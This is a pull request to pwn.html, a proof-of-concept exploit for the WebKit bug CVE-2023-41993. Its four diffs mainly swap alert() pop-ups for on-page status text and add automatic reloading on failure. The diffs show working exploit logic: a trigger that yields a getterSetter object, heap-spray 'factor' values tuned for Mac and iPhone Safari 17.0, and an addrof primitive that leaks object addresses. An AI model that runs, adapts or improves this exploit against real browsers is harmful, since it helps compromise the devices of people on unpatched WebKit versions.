### PR TITLE
Show more information to user in pwn.html

### DIFF
--- a/pwn.html
+++ b/pwn.html
@@ -1,4 +1,3 @@
-
 <!DOCTYPE html>
 <html>
 <body>
@@ -119,7 +118,7 @@ function trigger(type) {
     if (unknown_device == true) {
         document.getElementById("unknown_device").textContent = "Device may be unsupported. Still attempting....";
     } else {
-        document.getElementById("unknown_device").textContent = "Device may be supported. attempting....";
+        document.getElementById("unknown_device").textContent = "Device may be supported. Attempting....";
     }
     let [getter, getterSetter] = trigger();
     let success = false;
@@ -158,23 +157,20 @@ function trigger(type) {
     
     let sample = BigInt(addrof({}).toString());
     if (sample >= 0x200000000 || sample < 0x100000000) {
-        alert('failed');
+        console.log('failed');
         document.getElementById("success").textContent = "failed";
         location.reload();
         return;
     } else {
-        alert(`success!!!`);
+        console.log(`success!!!`);
         document.getElementById("success").textContent = "success!!!";
         if (unknown_device) {
-            alert(`you seems to have found vallid factor for an untested device!\nif you send this information to me, it could be helpful to others.\nisMac: ${isMac}, isIphone: ${isIphone}, version: ${version}, factor: ${factor}, userAgent: ${navigator.userAgent}`);
+            //alert(`you seems to have found vallid factor for an untested device!\nif you send this information to me, it could be helpful to others.\nisMac: ${isMac}, isIphone: ${isIphone}, version: ${version}, factor: ${factor}, userAgent: ${navigator.userAgent}`);
             document.getElementById("unknown_device").textContent = `you seems to have found vallid factor for an untested device!\nif you send this information to me, it could be helpful to others.\nisMac: ${isMac}, isIphone: ${isIphone}, version: ${version}, factor: ${factor}, userAgent: ${navigator.userAgent}`;
         }
     }
 
-    alert(addrof({}).toString());
-    alert(addrof({}).toString());
-    alert(addrof({}).toString());
-    alert(addrof({}).toString());
+    console.log(addrof({}).toString());
     document.getElementById("addr").textContent = addrof({}).toString();
 })();
 

--- a/pwn.html
+++ b/pwn.html
@@ -2,22 +2,22 @@
 <!DOCTYPE html>
 <html>
 <body>
-    <a href="https://github.com/po6ix/POC-for-CVE-2023-41993" target="_blank">github</a>
-    <br>
-    <p>agent: <span id="agent">waiting</span></p>
-    <p>factor: <span id="factor">waiting</span></p>
-    <p>status: <span id="success">waiting</span></p>
-    <p>result: <span id="addr">waiting</span></p>
-    <p>unknown_device?: <span id="unknown_device">waiting</span></p><p>'failed to get getterSetter' == keep waiting! ~100 refreshes to success or invalid device</p>
-    <a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-affected-versions" target="_blank">list of affected webkit versions</a><br>
-    <a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-unaffected-version" target="_blank">list of unaffected webkit versions</a>
-    <style>
-        p {
-            font-weight: bold;
-        } span {
-            font-weight: normal;
-        }
-    </style>
+<a href="https://github.com/po6ix/POC-for-CVE-2023-41993" target="_blank">github</a>
+<br>
+<p>agent: <span id="agent">waiting</span></p>
+<p>factor: <span id="factor">waiting</span></p>
+<p>status: <span id="success">waiting</span></p>
+<p>result: <span id="addr">waiting</span></p>
+<p>unknown_device?: <span id="unknown_device">waiting</span></p><p>'failed to get getterSetter' == keep waiting! ~100 refreshes to success or invalid device</p>
+<a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-affected-versions" target="_blank">list of affected webkit versions</a><br>
+<a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-unaffected-version" target="_blank">list of unaffected webkit versions</a>
+<style>
+    p {
+        font-weight: bold;
+    } span {
+        font-weight: normal;
+    }
+</style>
 <script src="./util.js"></script>
 <script src="./int64.js"></script>
 <script>
@@ -97,18 +97,16 @@ function trigger(type) {
 }
 
 (function pwn() {
-        let isMac = navigator.userAgent.indexOf('Macintosh;') !== -1;
+    let isMac = navigator.userAgent.indexOf('Macintosh;') !== -1;
     let isIphone = navigator.userAgent.indexOf('iPhone;') !== -1;
+    let version;
     try {
-    let version = navigator.userAgent.split('Version/')[1].split(' ')[0];
+        version = navigator.userAgent.split('Version/')[1].split(' ')[0];
     } catch(e) {
-        let version = "";
+        version = "";
     }
-        let factor;
+    let factor;
     let unknown_device = false;
-    
-    
-
     if (isMac && version == '17.0') {
         factor = 840;
     } else if (isIphone && version == '17.0') {
@@ -139,8 +137,6 @@ function trigger(type) {
     }
 
     let symbolObject = Object(getterSetter);
-
-
 
     let ref_arr = [];
     for (let i = 0; i < factor; ++i) {

--- a/pwn.html
+++ b/pwn.html
@@ -1,18 +1,23 @@
 <!DOCTYPE html>
 <html>
+<head>
+<meta charset="utf-8" />
+<meta name="viewport" content="width=device-width, initial-scale=1.0" />
+</head>
 <body>
 <a href="https://github.com/po6ix/POC-for-CVE-2023-41993" target="_blank">github</a>
 <br>
-<p>agent: <span id="agent">waiting</span></p>
-<p>factor: <span id="factor">waiting</span></p>
-<p>status: <span id="success">waiting</span></p>
-<p>result: <span id="addr">waiting</span></p>
-<p>unknown_device?: <span id="unknown_device">waiting</span></p><p>'failed to get getterSetter' == keep waiting! ~100 refreshes to success or invalid device</p>
+<p>agent: <span id="agent"></span></p>
+<p>factor: <span id="factor"></span></p>
+<p>status: <span id="success"></span></p>
+<p>result: <span id="addr"></span></p>
+<p>unknown_device?: <span id="unknown_device"></span></p><p>'failed to get getterSetter' == keep waiting! ~100 refreshes to success or invalid device</p>
 <a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-affected-versions" target="_blank">list of affected webkit versions</a><br>
 <a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-unaffected-version" target="_blank">list of unaffected webkit versions</a>
 <style>
     p {
         font-weight: bold;
+        min-height: 70px;
     } span {
         font-weight: normal;
     }

--- a/pwn.html
+++ b/pwn.html
@@ -1,9 +1,27 @@
+
 <!DOCTYPE html>
 <html>
 <body>
+    <a href="https://github.com/po6ix/POC-for-CVE-2023-41993" target="_blank">github</a>
+    <br>
+    <p>agent: <span id="agent">waiting</span></p>
+    <p>factor: <span id="factor">waiting</span></p>
+    <p>status: <span id="success">waiting</span></p>
+    <p>result: <span id="addr">waiting</span></p>
+    <p>unknown_device?: <span id="unknown_device">waiting</span></p><p>'failed to get getterSetter' == keep waiting! ~100 refreshes to success or invalid device</p>
+    <a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-affected-versions" target="_blank">list of affected webkit versions</a><br>
+    <a href="https://github.com/po6ix/POC-for-CVE-2023-41993#known-unaffected-version" target="_blank">list of unaffected webkit versions</a>
+    <style>
+        p {
+            font-weight: bold;
+        } span {
+            font-weight: normal;
+        }
+    </style>
 <script src="./util.js"></script>
 <script src="./int64.js"></script>
 <script>
+document.getElementById("agent").textContent = navigator.userAgent;
 /*
 author: @po6ix
 commit: https://github.com/WebKit/WebKit/commit/08d5d17c766ffc7ca6a7c833c5720eb71b427784
@@ -79,26 +97,17 @@ function trigger(type) {
 }
 
 (function pwn() {
-    let [getter, getterSetter] = trigger();
-    let success = false;
-    try {
-        getterSetter.toString();
-    } catch(e) {
-        // it should fail to call toString
-        success = true;
-    }
-    if (!success) {
-        alert('failed to get getterSetter');
-        return;
-    }
-
-    let symbolObject = Object(getterSetter);
-
-    let isMac = navigator.userAgent.indexOf('Macintosh;') !== -1;
+        let isMac = navigator.userAgent.indexOf('Macintosh;') !== -1;
     let isIphone = navigator.userAgent.indexOf('iPhone;') !== -1;
+    try {
     let version = navigator.userAgent.split('Version/')[1].split(' ')[0];
-    let factor;
+    } catch(e) {
+        let version = "";
+    }
+        let factor;
     let unknown_device = false;
+    
+    
 
     if (isMac && version == '17.0') {
         factor = 840;
@@ -108,6 +117,30 @@ function trigger(type) {
         factor = 87 + Math.floor(Math.random() * 1000);
         unknown_device = true;
     }
+    document.getElementById("factor").textContent = factor;
+    if (unknown_device == true) {
+        document.getElementById("unknown_device").textContent = "Device may be unsupported. Still attempting....";
+    } else {
+        document.getElementById("unknown_device").textContent = "Device may be supported. attempting....";
+    }
+    let [getter, getterSetter] = trigger();
+    let success = false;
+    try {
+        getterSetter.toString();
+    } catch(e) {
+        // it should fail to call toString
+        success = true;
+    }
+    if (!success) {
+        console.log('failed to get getterSetter');
+        document.getElementById("success").textContent = "failed to get getterSetter";
+        location.reload();
+        return;
+    }
+
+    let symbolObject = Object(getterSetter);
+
+
 
     let ref_arr = [];
     for (let i = 0; i < factor; ++i) {
@@ -129,13 +162,16 @@ function trigger(type) {
     
     let sample = BigInt(addrof({}).toString());
     if (sample >= 0x200000000 || sample < 0x100000000) {
-        // alert('failed');
+        alert('failed');
+        document.getElementById("success").textContent = "failed";
         location.reload();
         return;
     } else {
         alert(`success!!!`);
+        document.getElementById("success").textContent = "success!!!";
         if (unknown_device) {
             alert(`you seems to have found vallid factor for an untested device!\nif you send this information to me, it could be helpful to others.\nisMac: ${isMac}, isIphone: ${isIphone}, version: ${version}, factor: ${factor}, userAgent: ${navigator.userAgent}`);
+            document.getElementById("unknown_device").textContent = `you seems to have found vallid factor for an untested device!\nif you send this information to me, it could be helpful to others.\nisMac: ${isMac}, isIphone: ${isIphone}, version: ${version}, factor: ${factor}, userAgent: ${navigator.userAgent}`;
         }
     }
 
@@ -143,6 +179,7 @@ function trigger(type) {
     alert(addrof({}).toString());
     alert(addrof({}).toString());
     alert(addrof({}).toString());
+    document.getElementById("addr").textContent = addrof({}).toString();
 })();
 
 </script>


### PR DESCRIPTION
Doesn't at all overhaul the styling or existing format of JS code, rather changes `alert()` to modify existing `<p>` tags. Should be easy to read and understand. Also adds a little tip and auto window refreshing on 'failed to get getterSetter'.